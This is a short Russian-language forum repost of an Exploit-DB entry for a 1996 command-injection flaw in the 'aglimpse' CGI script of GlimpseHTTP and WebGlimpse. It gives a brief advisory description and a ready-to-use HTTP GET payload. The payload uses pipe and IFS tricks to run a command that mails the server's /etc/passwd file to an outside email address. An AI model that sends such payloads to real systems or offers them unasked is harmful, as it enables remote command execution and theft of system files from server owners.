Exploit GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20449
Проверка EDB
  1. Пройдено
Автор
RAZVAN DRAGOMIRESCU
Тип уязвимости
REMOTE
Платформа
UNIX
CVE
cve-1999-0147
Дата публикации
1996-07-03
Код:
source: https://www.securityfocus.com/bid/2026/info

WebGlimpse and GlimpseHTTP are web indexing and search engine programs with some associated management scripts. GlimpseHTTP up to and including 2.0, and WebGlimpse prior to version 1.5, suffer from a common vulnerability involving the component "aglimpse". This script fails to filter the pipe metacharacter, allowing arbitrary command execution. The demonstration exploit for this vulnerability includes the unix shell "IFS" (Internal Field Separator) variable for situations where the web server filters space characters - by setting this to an acceptable character ("5" in the example exploit) it is possible to use commands with more than one field. (eg., "mail [email protected]"). 

GET /cgi-bin/aglimpse|IFS=5;CMD=mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval5$CMD;echo
 
Источник
www.exploit-db.com